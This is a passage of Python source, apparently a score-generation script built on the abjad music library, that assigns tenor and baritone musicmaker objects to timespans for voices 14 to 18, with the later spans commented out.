# [(156, 8), (158, 8), tenor_three_musicmaker_three],
# [(158, 8), (160, 8), tenor_three_musicmaker_two],
# [(160, 8), (162, 8), tenor_three_musicmaker_two],
# [(162, 8), (164, 8), tenor_three_musicmaker_two],
# [(164, 8), (166, 8), tenor_three_musicmaker_two],
# [(166, 8), (168, 8), tenor_three_musicmaker_three],
# [(168, 8), (170, 8), tenor_three_musicmaker_three],
# [(170, 8), (172, 8), tenor_three_musicmaker_three],
# [(172, 8), (174, 8), tenor_three_musicmaker_three],
# [(174, 8), (176, 8), tenor_three_musicmaker_three],
# [(176, 8), (178, 8), tenor_three_musicmaker_two],
# [(178, 8), (180, 8), tenor_three_musicmaker_two],
# [(180, 8), (182, 8), tenor_three_musicmaker_two],
# [(182, 8), (184, 8), tenor_three_musicmaker_three],
# [(184, 8), (186, 8), tenor_three_musicmaker_three],
# [(186, 8), (188, 8), tenor_three_musicmaker_three],
# [(188, 8), (190, 8), tenor_three_musicmaker_three],
# [(190, 8), (192, 8), tenor_three_musicmaker_two],
# [(192, 8), (194, 8), tenor_three_musicmaker_three],
# [(194, 8), (196, 8), tenor_three_musicmaker_two],
# [(196, 8), (198, 8), tenor_three_musicmaker_two],
# [(198, 8), (199, 8), tenor_three_musicmaker_two],
]
])
voice_14_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 14',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), tenor_four_musicmaker_two],
[(2, 8), (4, 8), tenor_four_musicmaker_two],
[(4, 8), (6, 8), tenor_four_musicmaker_two],
[(6, 8), (8, 8), tenor_four_musicmaker_two],
[(8, 8), (10, 8), tenor_four_musicmaker_two],
[(10, 8), (12, 8), tenor_four_musicmaker_two],
[(12, 8), (14, 8), tenor_four_musicmaker_two],
[(14, 8), (16, 8), tenor_four_musicmaker_two],
[(16, 8), (18, 8), tenor_four_musicmaker_three],
[(18, 8), (20, 8), tenor_four_musicmaker_three],
[(20, 8), (22, 8), tenor_four_musicmaker_three],
[(22, 8), (24, 8), tenor_four_musicmaker_three],
[(24, 8), (26, 8), tenor_four_musicmaker_three],
[(26, 8), (28, 8), tenor_four_musicmaker_three],
[(28, 8), (30, 8), tenor_four_musicmaker_three],
[(30, 8), (32, 8), tenor_four_musicmaker_three],
[(32, 8), (34, 8), tenor_four_musicmaker_two],
[(34, 8), (36, 8), tenor_four_musicmaker_two],
[(36, 8), (38, 8), tenor_four_musicmaker_two],
[(38, 8), (40, 8), tenor_four_musicmaker_two],
[(40, 8), (42, 8), tenor_four_musicmaker_two],
[(42, 8), (44, 8), tenor_four_musicmaker_two],
[(44, 8), (46, 8), tenor_four_musicmaker_two],
[(46, 8), (48, 8), tenor_four_musicmaker_two],
[(48, 8), (50, 8), tenor_four_musicmaker_three],
[(50, 8), (52, 8), tenor_four_musicmaker_three],
[(52, 8), (54, 8), tenor_four_musicmaker_three],
[(54, 8), (56, 8), tenor_four_musicmaker_three],
[(56, 8), (58, 8), tenor_four_musicmaker_three],
[(58, 8), (60, 8), tenor_four_musicmaker_three],
[(60, 8), (62, 8), tenor_four_musicmaker_three],
[(62, 8), (64, 8), tenor_four_musicmaker_two],
[(64, 8), (66, 8), tenor_four_musicmaker_two],
[(66, 8), (68, 8), tenor_four_musicmaker_two],
[(68, 8), (70, 8), tenor_four_musicmaker_two],
[(70, 8), (72, 8), tenor_four_musicmaker_two],
[(72, 8), (74, 8), tenor_four_musicmaker_two],
[(74, 8), (76, 8), tenor_four_musicmaker_three],
[(76, 8), (78, 8), tenor_four_musicmaker_three],
[(78, 8), (80, 8), tenor_four_musicmaker_three],
[(80, 8), (82, 8), tenor_four_musicmaker_three],
[(82, 8), (84, 8), tenor_four_musicmaker_three],
[(84, 8), (86, 8), tenor_four_musicmaker_two],
[(86, 8), (88, 8), tenor_four_musicmaker_two],
[(88, 8), (90, 8), tenor_four_musicmaker_two],
[(90, 8), (92, 8), tenor_four_musicmaker_two],
[(92, 8), (94, 8), tenor_four_musicmaker_three],
[(94, 8), (96, 8), tenor_four_musicmaker_three],
[(96, 8), (98, 8), tenor_four_musicmaker_three],
[(98, 8), (100, 8), tenor_four_musicmaker_two],
[(100, 8), (102, 8), tenor_four_musicmaker_two],
[(102, 8), (104, 8), tenor_four_musicmaker_three],
# [(104, 8), (106, 8), tenor_four_musicmaker_two],
# [(106, 8), (108, 8), tenor_four_musicmaker_three],
# [(108, 8), (110, 8), tenor_four_musicmaker_three],
# [(110, 8), (112, 8), tenor_four_musicmaker_two],
# [(112, 8), (114, 8), tenor_four_musicmaker_two],
# [(114, 8), (116, 8), tenor_four_musicmaker_two],
# [(116, 8), (118, 8), tenor_four_musicmaker_three],
# [(118, 8), (120, 8), tenor_four_musicmaker_three],
# [(120, 8), (122, 8), tenor_four_musicmaker_three],
# [(122, 8), (124, 8), tenor_four_musicmaker_three],
# [(124, 8), (126, 8), tenor_four_musicmaker_two],
# [(126, 8), (128, 8), tenor_four_musicmaker_two],
# [(128, 8), (130, 8), tenor_four_musicmaker_two],
# [(130, 8), (132, 8), tenor_four_musicmaker_two],
# [(132, 8), (134, 8), tenor_four_musicmaker_two],
# [(134, 8), (136, 8), tenor_four_musicmaker_three],
# [(136, 8), (138, 8), tenor_four_musicmaker_three],
# [(138, 8), (140, 8), tenor_four_musicmaker_three],
# [(140, 8), (142, 8), tenor_four_musicmaker_three],
# [(142, 8), (144, 8), tenor_four_musicmaker_three],
# [(144, 8), (146, 8), tenor_four_musicmaker_three],
# [(146, 8), (148, 8), tenor_four_musicmaker_two],
# [(148, 8), (150, 8), tenor_four_musicmaker_two],
# [(150, 8), (152, 8), tenor_four_musicmaker_two],
# [(152, 8), (154, 8), tenor_four_musicmaker_two],
# [(154, 8), (156, 8), tenor_four_musicmaker_two],
# [(156, 8), (158, 8), tenor_four_musicmaker_two],
# [(158, 8), (160, 8), tenor_four_musicmaker_two],
# [(160, 8), (162, 8), tenor_four_musicmaker_three],
# [(162, 8), (164, 8), tenor_four_musicmaker_three],
# [(164, 8), (166, 8), tenor_four_musicmaker_three],
# [(166, 8), (168, 8), tenor_four_musicmaker_three],
# [(168, 8), (170, 8), tenor_four_musicmaker_three],
# [(170, 8), (172, 8), tenor_four_musicmaker_three],
# [(172, 8), (174, 8), tenor_four_musicmaker_three],
# [(174, 8), (176, 8), tenor_four_musicmaker_three],
# [(176, 8), (178, 8), tenor_four_musicmaker_two],
# [(178, 8), (180, 8), tenor_four_musicmaker_two],
# [(180, 8), (182, 8), tenor_four_musicmaker_two],
# [(182, 8), (184, 8), tenor_four_musicmaker_two],
# [(184, 8), (186, 8), tenor_four_musicmaker_two],
# [(186, 8), (188, 8), tenor_four_musicmaker_two],
# [(188, 8), (190, 8), tenor_four_musicmaker_two],
# [(190, 8), (192, 8), tenor_four_musicmaker_two],
# [(192, 8), (194, 8), tenor_four_musicmaker_three],
# [(194, 8), (196, 8), tenor_four_musicmaker_three],
# [(196, 8), (198, 8), tenor_four_musicmaker_two],
# [(198, 8), (199, 8), tenor_four_musicmaker_two],
]
])
voice_15_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 15',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), tenor_five_musicmaker_two],
[(2, 8), (4, 8), tenor_five_musicmaker_two],
[(4, 8), (6, 8), tenor_five_musicmaker_two],
[(6, 8), (8, 8), tenor_five_musicmaker_three],
[(8, 8), (10, 8), tenor_five_musicmaker_three],
[(10, 8), (12, 8), tenor_five_musicmaker_three],
[(12, 8), (14, 8), tenor_five_musicmaker_two],
[(14, 8), (16, 8), tenor_five_musicmaker_two],
[(16, 8), (18, 8), tenor_five_musicmaker_two],
[(18, 8), (20, 8), tenor_five_musicmaker_two],
[(20, 8), (22, 8), tenor_five_musicmaker_three],
[(22, 8), (24, 8), tenor_five_musicmaker_three],
[(24, 8), (26, 8), tenor_five_musicmaker_three],
[(26, 8), (28, 8), tenor_five_musicmaker_three],
[(28, 8), (30, 8), tenor_five_musicmaker_two],
[(30, 8), (32, 8), tenor_five_musicmaker_two],
[(32, 8), (34, 8), tenor_five_musicmaker_two],
[(34, 8), (36, 8), tenor_five_musicmaker_three],
[(36, 8), (38, 8), tenor_five_musicmaker_three],
[(38, 8), (40, 8), tenor_five_musicmaker_three],
[(40, 8), (42, 8), tenor_five_musicmaker_three],
[(42, 8), (44, 8), tenor_five_musicmaker_two],
[(44, 8), (46, 8), tenor_five_musicmaker_two],
[(46, 8), (48, 8), tenor_five_musicmaker_three],
[(48, 8), (50, 8), tenor_five_musicmaker_three],
[(50, 8), (52, 8), tenor_five_musicmaker_three],
[(52, 8), (54, 8), tenor_five_musicmaker_three],
[(54, 8), (56, 8), tenor_five_musicmaker_three],
[(56, 8), (58, 8), tenor_five_musicmaker_three],
[(58, 8), (60, 8), tenor_five_musicmaker_two],
[(60, 8), (62, 8), tenor_five_musicmaker_three],
[(62, 8), (64, 8), tenor_five_musicmaker_three],
[(64, 8), (66, 8), tenor_five_musicmaker_three],
[(66, 8), (68, 8), tenor_five_musicmaker_three],
[(68, 8), (70, 8), tenor_five_musicmaker_three],
[(70, 8), (72, 8), tenor_five_musicmaker_three],
[(72, 8), (74, 8), tenor_five_musicmaker_three],
[(74, 8), (76, 8), tenor_five_musicmaker_two],
[(76, 8), (78, 8), tenor_five_musicmaker_two],
[(78, 8), (80, 8), tenor_five_musicmaker_two],
[(80, 8), (82, 8), tenor_five_musicmaker_two],
[(82, 8), (84, 8), tenor_five_musicmaker_two],
[(84, 8), (86, 8), tenor_five_musicmaker_two],
[(86, 8), (88, 8), tenor_five_musicmaker_two],
[(88, 8), (90, 8), tenor_five_musicmaker_two],
[(90, 8), (92, 8), tenor_five_musicmaker_three],
[(92, 8), (94, 8), tenor_five_musicmaker_three],
[(94, 8), (96, 8), tenor_five_musicmaker_three],
[(96, 8), (98, 8), tenor_five_musicmaker_three],
[(98, 8), (100, 8), tenor_five_musicmaker_three],
[(100, 8), (102, 8), tenor_five_musicmaker_three],
[(102, 8), (104, 8), tenor_five_musicmaker_three],
# [(104, 8), (106, 8), tenor_five_musicmaker_two],
# [(106, 8), (108, 8), tenor_five_musicmaker_two],
# [(108, 8), (110, 8), tenor_five_musicmaker_two],
# [(110, 8), (112, 8), tenor_five_musicmaker_two],
# [(112, 8), (114, 8), tenor_five_musicmaker_two],
# [(114, 8), (116, 8), tenor_five_musicmaker_two],
# [(116, 8), (118, 8), tenor_five_musicmaker_two],
# [(118, 8), (120, 8), tenor_five_musicmaker_three],
# [(120, 8), (122, 8), tenor_five_musicmaker_three],
# [(122, 8), (124, 8), tenor_five_musicmaker_three],
# [(124, 8), (126, 8), tenor_five_musicmaker_three],
# [(126, 8), (128, 8), tenor_five_musicmaker_three],
# [(128, 8), (130, 8), tenor_five_musicmaker_three],
# [(130, 8), (132, 8), tenor_five_musicmaker_three],
# [(132, 8), (134, 8), tenor_five_musicmaker_three],
# [(134, 8), (136, 8), tenor_five_musicmaker_two],
# [(136, 8), (138, 8), tenor_five_musicmaker_two],
# [(138, 8), (140, 8), tenor_five_musicmaker_two],
# [(140, 8), (142, 8), tenor_five_musicmaker_two],
# [(142, 8), (144, 8), tenor_five_musicmaker_two],
# [(144, 8), (146, 8), tenor_five_musicmaker_two],
# [(146, 8), (148, 8), tenor_five_musicmaker_two],
# [(148, 8), (150, 8), tenor_five_musicmaker_three],
# [(150, 8), (152, 8), tenor_five_musicmaker_two],
# [(152, 8), (154, 8), tenor_five_musicmaker_two],
# [(154, 8), (156, 8), tenor_five_musicmaker_three],
# [(156, 8), (158, 8), tenor_five_musicmaker_three],
# [(158, 8), (160, 8), tenor_five_musicmaker_two],
# [(160, 8), (162, 8), tenor_five_musicmaker_two],
# [(162, 8), (164, 8), tenor_five_musicmaker_two],
# [(164, 8), (166, 8), tenor_five_musicmaker_three],
# [(166, 8), (168, 8), tenor_five_musicmaker_three],
# [(168, 8), (170, 8), tenor_five_musicmaker_two],
# [(170, 8), (172, 8), tenor_five_musicmaker_two],
# [(172, 8), (174, 8), tenor_five_musicmaker_two],
# [(174, 8), (176, 8), tenor_five_musicmaker_two],
# [(176, 8), (178, 8), tenor_five_musicmaker_three],
# [(178, 8), (180, 8), tenor_five_musicmaker_three],
# [(180, 8), (182, 8), tenor_five_musicmaker_two],
# [(182, 8), (184, 8), tenor_five_musicmaker_two],
# [(184, 8), (186, 8), tenor_five_musicmaker_two],
# [(186, 8), (188, 8), tenor_five_musicmaker_two],
# [(188, 8), (190, 8), tenor_five_musicmaker_two],
# [(190, 8), (192, 8), tenor_five_musicmaker_three],
# [(192, 8), (194, 8), tenor_five_musicmaker_three],
# [(194, 8), (196, 8), tenor_five_musicmaker_three],
# [(196, 8), (198, 8), tenor_five_musicmaker_three],
# [(198, 8), (199, 8), tenor_five_musicmaker_three],
]
])
voice_16_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 16',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_one_musicmaker_two],
[(2, 8), (4, 8), baritone_one_musicmaker_two],
[(4, 8), (6, 8), baritone_one_musicmaker_two],
[(6, 8), (8, 8), baritone_one_musicmaker_two],
[(8, 8), (10, 8), baritone_one_musicmaker_three],
[(10, 8), (12, 8), baritone_one_musicmaker_three],
[(12, 8), (14, 8), baritone_one_musicmaker_three],
[(14, 8), (16, 8), baritone_one_musicmaker_two],
[(16, 8), (18, 8), baritone_one_musicmaker_two],
[(18, 8), (20, 8), baritone_one_musicmaker_two],
[(20, 8), (22, 8), baritone_one_musicmaker_two],
[(22, 8), (24, 8), baritone_one_musicmaker_three],
[(24, 8), (26, 8), baritone_one_musicmaker_three],
[(26, 8), (28, 8), baritone_one_musicmaker_three],
[(28, 8), (30, 8), baritone_one_musicmaker_two],
[(30, 8), (32, 8), baritone_one_musicmaker_two],
[(32, 8), (34, 8), baritone_one_musicmaker_two],
[(34, 8), (36, 8), baritone_one_musicmaker_two],
[(36, 8), (38, 8), baritone_one_musicmaker_three],
[(38, 8), (40, 8), baritone_one_musicmaker_three],
[(40, 8), (42, 8), baritone_one_musicmaker_three],
[(42, 8), (44, 8), baritone_one_musicmaker_two],
[(44, 8), (46, 8), baritone_one_musicmaker_two],
[(46, 8), (48, 8), baritone_one_musicmaker_two],
[(48, 8), (50, 8), baritone_one_musicmaker_two],
[(50, 8), (52, 8), baritone_one_musicmaker_three],
[(52, 8), (54, 8), baritone_one_musicmaker_three],
[(54, 8), (56, 8), baritone_one_musicmaker_three],
[(56, 8), (58, 8), baritone_one_musicmaker_two],
[(58, 8), (60, 8), baritone_one_musicmaker_two],
[(60, 8), (62, 8), baritone_one_musicmaker_two],
[(62, 8), (64, 8), baritone_one_musicmaker_two],
[(64, 8), (66, 8), baritone_one_musicmaker_three],
[(66, 8), (68, 8), baritone_one_musicmaker_three],
[(68, 8), (70, 8), baritone_one_musicmaker_three],
[(70, 8), (72, 8), baritone_one_musicmaker_two],
[(72, 8), (74, 8), baritone_one_musicmaker_two],
[(74, 8), (76, 8), baritone_one_musicmaker_two],
[(76, 8), (78, 8), baritone_one_musicmaker_two],
[(78, 8), (80, 8), baritone_one_musicmaker_three],
[(80, 8), (82, 8), baritone_one_musicmaker_three],
[(82, 8), (84, 8), baritone_one_musicmaker_three],
[(84, 8), (86, 8), baritone_one_musicmaker_two],
[(86, 8), (88, 8), baritone_one_musicmaker_two],
[(88, 8), (90, 8), baritone_one_musicmaker_two],
[(90, 8), (92, 8), baritone_one_musicmaker_two],
[(92, 8), (94, 8), baritone_one_musicmaker_three],
[(94, 8), (96, 8), baritone_one_musicmaker_three],
[(96, 8), (98, 8), baritone_one_musicmaker_three],
[(98, 8), (100, 8), baritone_one_musicmaker_two],
[(100, 8), (102, 8), baritone_one_musicmaker_two],
[(102, 8), (104, 8), baritone_one_musicmaker_two],
# [(104, 8), (106, 8), baritone_one_musicmaker_two],
# [(106, 8), (108, 8), baritone_one_musicmaker_three],
# [(108, 8), (110, 8), baritone_one_musicmaker_three],
# [(110, 8), (112, 8), baritone_one_musicmaker_three],
# [(112, 8), (114, 8), baritone_one_musicmaker_three],
# [(114, 8), (116, 8), baritone_one_musicmaker_two],
# [(116, 8), (118, 8), baritone_one_musicmaker_two],
# [(118, 8), (120, 8), baritone_one_musicmaker_two],
# [(120, 8), (122, 8), baritone_one_musicmaker_three],
# [(122, 8), (124, 8), baritone_one_musicmaker_three],
# [(124, 8), (126, 8), baritone_one_musicmaker_three],
# [(126, 8), (128, 8), baritone_one_musicmaker_three],
# [(128, 8), (130, 8), baritone_one_musicmaker_two],
# [(130, 8), (132, 8), baritone_one_musicmaker_two],
# [(132, 8), (134, 8), baritone_one_musicmaker_two],
# [(134, 8), (136, 8), baritone_one_musicmaker_three],
# [(136, 8), (138, 8), baritone_one_musicmaker_three],
# [(138, 8), (140, 8), baritone_one_musicmaker_three],
# [(140, 8), (142, 8), baritone_one_musicmaker_three],
# [(142, 8), (144, 8), baritone_one_musicmaker_two],
# [(144, 8), (146, 8), baritone_one_musicmaker_two],
# [(146, 8), (148, 8), baritone_one_musicmaker_two],
# [(148, 8), (150, 8), baritone_one_musicmaker_three],
# [(150, 8), (152, 8), baritone_one_musicmaker_three],
# [(152, 8), (154, 8), baritone_one_musicmaker_three],
# [(154, 8), (156, 8), baritone_one_musicmaker_three],
# [(156, 8), (158, 8), baritone_one_musicmaker_two],
# [(158, 8), (160, 8), baritone_one_musicmaker_two],
# [(160, 8), (162, 8), baritone_one_musicmaker_two],
# [(162, 8), (164, 8), baritone_one_musicmaker_three],
# [(164, 8), (166, 8), baritone_one_musicmaker_three],
# [(166, 8), (168, 8), baritone_one_musicmaker_three],
# [(168, 8), (170, 8), baritone_one_musicmaker_three],
# [(170, 8), (172, 8), baritone_one_musicmaker_two],
# [(172, 8), (174, 8), baritone_one_musicmaker_two],
# [(174, 8), (176, 8), baritone_one_musicmaker_two],
# [(176, 8), (178, 8), baritone_one_musicmaker_three],
# [(178, 8), (180, 8), baritone_one_musicmaker_three],
# [(180, 8), (182, 8), baritone_one_musicmaker_three],
# [(182, 8), (184, 8), baritone_one_musicmaker_three],
# [(184, 8), (186, 8), baritone_one_musicmaker_two],
# [(186, 8), (188, 8), baritone_one_musicmaker_two],
# [(188, 8), (190, 8), baritone_one_musicmaker_two],
# [(190, 8), (192, 8), baritone_one_musicmaker_three],
# [(192, 8), (194, 8), baritone_one_musicmaker_three],
# [(194, 8), (196, 8), baritone_one_musicmaker_three],
# [(196, 8), (198, 8), baritone_one_musicmaker_three],
# [(198, 8), (199, 8), baritone_one_musicmaker_two],
]
])
voice_17_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 17',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_two_musicmaker_three],
[(2, 8), (4, 8), baritone_two_musicmaker_three],
[(4, 8), (6, 8), baritone_two_musicmaker_two],
[(6, 8), (8, 8), baritone_two_musicmaker_two],
[(8, 8), (10, 8), baritone_two_musicmaker_two],
[(10, 8), (12, 8), baritone_two_musicmaker_three],
[(12, 8), (14, 8), baritone_two_musicmaker_three],
[(14, 8), (16, 8), baritone_two_musicmaker_three],
[(16, 8), (18, 8), baritone_two_musicmaker_three],
[(18, 8), (20, 8), baritone_two_musicmaker_two],
[(20, 8), (22, 8), baritone_two_musicmaker_two],
[(22, 8), (24, 8), baritone_two_musicmaker_two],
[(24, 8), (26, 8), baritone_two_musicmaker_two],
[(26, 8), (28, 8), baritone_two_musicmaker_two],
[(28, 8), (30, 8), baritone_two_musicmaker_three],
[(30, 8), (32, 8), baritone_two_musicmaker_three],
[(32, 8), (34, 8), baritone_two_musicmaker_three],
[(34, 8), (36, 8), baritone_two_musicmaker_three],
[(36, 8), (38, 8), baritone_two_musicmaker_three],
[(38, 8), (40, 8), baritone_two_musicmaker_three],
[(40, 8), (42, 8), baritone_two_musicmaker_two],
[(42, 8), (44, 8), baritone_two_musicmaker_two],
[(44, 8), (46, 8), baritone_two_musicmaker_two],
[(46, 8), (48, 8), baritone_two_musicmaker_two],
[(48, 8), (50, 8), baritone_two_musicmaker_two],
[(50, 8), (52, 8), baritone_two_musicmaker_two],
[(52, 8), (54, 8), baritone_two_musicmaker_two],
[(54, 8), (56, 8), baritone_two_musicmaker_three],
[(56, 8), (58, 8), baritone_two_musicmaker_three],
[(58, 8), (60, 8), baritone_two_musicmaker_three],
[(60, 8), (62, 8), baritone_two_musicmaker_three],
[(62, 8), (64, 8), baritone_two_musicmaker_three],
[(64, 8), (66, 8), baritone_two_musicmaker_three],
[(66, 8), (68, 8), baritone_two_musicmaker_three],
[(68, 8), (70, 8), baritone_two_musicmaker_two],
[(70, 8), (72, 8), baritone_two_musicmaker_two],
[(72, 8), (74, 8), baritone_two_musicmaker_two],
[(74, 8), (76, 8), baritone_two_musicmaker_two],
[(76, 8), (78, 8), baritone_two_musicmaker_two],
[(78, 8), (80, 8), baritone_two_musicmaker_two],
[(80, 8), (82, 8), baritone_two_musicmaker_two],
[(82, 8), (84, 8), baritone_two_musicmaker_three],
[(84, 8), (86, 8), baritone_two_musicmaker_three],
[(86, 8), (88, 8), baritone_two_musicmaker_three],
[(88, 8), (90, 8), baritone_two_musicmaker_three],
[(90, 8), (92, 8), baritone_two_musicmaker_three],
[(92, 8), (94, 8), baritone_two_musicmaker_three],
[(94, 8), (96, 8), baritone_two_musicmaker_three],
[(96, 8), (98, 8), baritone_two_musicmaker_two],
[(98, 8), (100, 8), baritone_two_musicmaker_two],
[(100, 8), (102, 8), baritone_two_musicmaker_two],
[(102, 8), (104, 8), baritone_two_musicmaker_two],
# [(104, 8), (106, 8), baritone_two_musicmaker_two],
# [(106, 8), (108, 8), baritone_two_musicmaker_three],
# [(108, 8), (110, 8), baritone_two_musicmaker_three],
# [(110, 8), (112, 8), baritone_two_musicmaker_three],
# [(112, 8), (114, 8), baritone_two_musicmaker_three],
# [(114, 8), (116, 8), baritone_two_musicmaker_three],
# [(116, 8), (118, 8), baritone_two_musicmaker_two],
# [(118, 8), (120, 8), baritone_two_musicmaker_two],
# [(120, 8), (122, 8), baritone_two_musicmaker_two],
# [(122, 8), (124, 8), baritone_two_musicmaker_two],
# [(124, 8), (126, 8), baritone_two_musicmaker_two],
# [(126, 8), (128, 8), baritone_two_musicmaker_three],
# [(128, 8), (130, 8), baritone_two_musicmaker_three],
# [(130, 8), (132, 8), baritone_two_musicmaker_three],
# [(132, 8), (134, 8), baritone_two_musicmaker_three],
# [(134, 8), (136, 8), baritone_two_musicmaker_three],
# [(136, 8), (138, 8), baritone_two_musicmaker_two],
# [(138, 8), (140, 8), baritone_two_musicmaker_two],
# [(140, 8), (142, 8), baritone_two_musicmaker_two],
# [(142, 8), (144, 8), baritone_two_musicmaker_two],
# [(144, 8), (146, 8), baritone_two_musicmaker_two],
# [(146, 8), (148, 8), baritone_two_musicmaker_three],
# [(148, 8), (150, 8), baritone_two_musicmaker_three],
# [(150, 8), (152, 8), baritone_two_musicmaker_three],
# [(152, 8), (154, 8), baritone_two_musicmaker_three],
# [(154, 8), (156, 8), baritone_two_musicmaker_three],
# [(156, 8), (158, 8), baritone_two_musicmaker_two],
# [(158, 8), (160, 8), baritone_two_musicmaker_two],
# [(160, 8), (162, 8), baritone_two_musicmaker_two],
# [(162, 8), (164, 8), baritone_two_musicmaker_three],
# [(164, 8), (166, 8), baritone_two_musicmaker_three],
# [(166, 8), (168, 8), baritone_two_musicmaker_three],
# [(168, 8), (170, 8), baritone_two_musicmaker_two],
# [(170, 8), (172, 8), baritone_two_musicmaker_two],
# [(172, 8), (174, 8), baritone_two_musicmaker_two],
# [(174, 8), (176, 8), baritone_two_musicmaker_three],
# [(176, 8), (178, 8), baritone_two_musicmaker_three],
# [(178, 8), (180, 8), baritone_two_musicmaker_three],
# [(180, 8), (182, 8), baritone_two_musicmaker_two],
# [(182, 8), (184, 8), baritone_two_musicmaker_two],
# [(184, 8), (186, 8), baritone_two_musicmaker_two],
# [(186, 8), (188, 8), baritone_two_musicmaker_three],
# [(188, 8), (190, 8), baritone_two_musicmaker_three],
# [(190, 8), (192, 8), baritone_two_musicmaker_three],
# [(192, 8), (194, 8), baritone_two_musicmaker_two],
# [(194, 8), (196, 8), baritone_two_musicmaker_two],
# [(196, 8), (198, 8), baritone_two_musicmaker_two],
# [(198, 8), (199, 8), baritone_two_musicmaker_three],
]
])
voice_18_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 18',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_three_musicmaker_three],
[(2, 8), (4, 8), baritone_three_musicmaker_three],
[(4, 8), (6, 8), baritone_three_musicmaker_three],
[(6, 8), (8, 8), baritone_three_musicmaker_three],
[(8, 8), (10, 8), baritone_three_musicmaker_two],
[(10, 8), (12, 8), baritone_three_musicmaker_two],
[(12, 8), (14, 8), baritone_three_musicmaker_two],
[(14, 8), (16, 8), baritone_three_musicmaker_two],
[(16, 8), (18, 8), baritone_three_musicmaker_three],
[(18, 8), (20, 8), baritone_three_musicmaker_three],
[(20, 8), (22, 8), baritone_three_musicmaker_three],
[(22, 8), (24, 8), baritone_three_musicmaker_three],
[(24, 8), (26, 8), baritone_three_musicmaker_two],
[(26, 8), (28, 8), baritone_three_musicmaker_two],
[(28, 8), (30, 8), baritone_three_musicmaker_two],
[(30, 8), (32, 8), baritone_three_musicmaker_two],
[(32, 8), (34, 8), baritone_three_musicmaker_three],
[(34, 8), (36, 8), baritone_three_musicmaker_three],
[(36, 8), (38, 8), baritone_three_musicmaker_three],
[(38, 8), (40, 8), baritone_three_musicmaker_three],
[(40, 8), (42, 8), baritone_three_musicmaker_two],
[(42, 8), (44, 8), baritone_three_musicmaker_two],
[(44, 8), (46, 8), baritone_three_musicmaker_two],
[(46, 8), (48, 8), baritone_three_musicmaker_two],
[(48, 8), (50, 8), baritone_three_musicmaker_three],
[(50, 8), (52, 8), baritone_three_musicmaker_three],
[(52, 8), (54, 8), baritone_three_musicmaker_three],
[(54, 8), (56, 8), baritone_three_musicmaker_three],
[(56, 8), (58, 8), baritone_three_musicmaker_two],
[(58, 8), (60, 8), baritone_three_musicmaker_two],
[(60, 8), (62, 8), baritone_three_musicmaker_two],
[(62, 8), (64, 8), baritone_three_musicmaker_two],
[(64, 8), (66, 8), baritone_three_musicmaker_three],
[(66, 8), (68, 8), baritone_three_musicmaker_three],
[(68, 8), (70, 8), baritone_three_musicmaker_three],
[(70, 8), (72, 8), baritone_three_musicmaker_three],
[(72, 8), (74, 8), baritone_three_musicmaker_two],
[(74, 8), (76, 8), baritone_three_musicmaker_two],
[(76, 8), (78, 8), baritone_three_musicmaker_two],
[(78, 8), (80, 8), baritone_three_musicmaker_two],
[(80, 8), (82, 8), baritone_three_musicmaker_three],
[(82, 8), (84, 8), baritone_three_musicmaker_three],
[(84, 8), (86, 8), baritone_three_musicmaker_three],
[(86, 8), (88, 8), baritone_three_musicmaker_three],
[(88, 8), (90, 8), baritone_three_musicmaker_two],
[(90, 8), (92, 8), baritone_three_musicmaker_two],
[(92, 8), (94, 8), baritone_three_musicmaker_two],
[(94, 8), (96, 8), baritone_three_musicmaker_two],
[(96, 8), (98, 8), baritone_three_musicmaker_three],
[(98, 8), (100, 8), baritone_three_musicmaker_three],
[(100, 8), (102, 8), baritone_three_musicmaker_three],
[(102, 8), (104, 8), baritone_three_musicmaker_three],
# [(104, 8), (106, 8), baritone_three_musicmaker_two],
# [(106, 8), (108, 8), baritone_three_musicmaker_two],
# [(108, 8), (110, 8), baritone_three_musicmaker_two],
# [(110, 8), (112, 8), baritone_three_musicmaker_two],
# [(112, 8), (114, 8), baritone_three_musicmaker_three],
# [(114, 8), (116, 8), baritone_three_musicmaker_three],
# [(116, 8), (118, 8), baritone_three_musicmaker_three],
# [(118, 8), (120, 8), baritone_three_musicmaker_three],
# [(120, 8), (122, 8), baritone_three_musicmaker_three],
# [(122, 8), (124, 8), baritone_three_musicmaker_two],
# [(124, 8), (126, 8), baritone_three_musicmaker_two],
# [(126, 8), (128, 8), baritone_three_musicmaker_two],
# [(128, 8), (130, 8), baritone_three_musicmaker_two],
# [(130, 8), (132, 8), baritone_three_musicmaker_two],
# [(132, 8), (134, 8), baritone_three_musicmaker_three],
# [(134, 8), (136, 8), baritone_three_musicmaker_three],
# [(136, 8), (138, 8), baritone_three_musicmaker_three],
# [(138, 8), (140, 8), baritone_three_musicmaker_three],
# [(140, 8), (142, 8), baritone_three_musicmaker_three],
# [(142, 8), (144, 8), baritone_three_musicmaker_two],
# [(144, 8), (146, 8), baritone_three_musicmaker_two],
# [(146, 8), (148, 8), baritone_three_musicmaker_two],
# [(148, 8), (150, 8), baritone_three_musicmaker_two],
# [(150, 8), (152, 8), baritone_three_musicmaker_two],
# [(152, 8), (154, 8), baritone_three_musicmaker_three],
# [(154, 8), (156, 8), baritone_three_musicmaker_three],
# [(156, 8), (158, 8), baritone_three_musicmaker_three],
# [(158, 8), (160, 8), baritone_three_musicmaker_three],
# [(160, 8), (162, 8), baritone_three_musicmaker_three],
# [(162, 8), (164, 8), baritone_three_musicmaker_two],
